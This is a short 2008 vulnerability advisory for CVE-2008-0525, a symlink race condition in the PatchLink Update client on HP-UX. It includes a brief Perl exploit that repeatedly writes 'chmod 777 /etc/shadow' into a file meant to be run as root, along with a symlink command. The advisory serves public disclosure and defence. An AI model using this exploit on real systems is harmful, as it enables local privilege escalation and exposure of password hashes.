Advisory #: 88
Title: Patchlink local root for HP-UX Shutdown and reboot
Author: Larry W. Cashdollar, @_larry0
Date: 2008-01-17
CVE-ID:[CVE-2008-0525]
CWE:
Download Site: http://lumension.com/patch-management.jsp?rpLangCode=1&rpMenuId=118443
Vendor: http://lumension.com
Vendor Notified: 2008-01-17
Vendor Contact: bugtraq
Advisory: http://www.vapid.dhs.org/advisories/patchlink_update_unix_client_local_root_during_reboot_on_hp-ux.html
Description: PatchLink Update provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats.
Vulnerability:
A race condition exists where a local user could symlink /tmp/plshutdown to a file in their home directory and inject malicous code. This could be done possibly by continuously writing to the file while waiting for the at command to run. <code> $ ln -s /tmp/plshutdown /var/tmp/runme
Export: JSON TEXT XML
Exploit Code:
  1. #/bin/perl
  2. while(1){
  3. `echo "chmod 777 /etc/shadow" > /var/tmp/runme`;
  4. }
  5.  
  6.  
Screen Shots:
Notes:
41152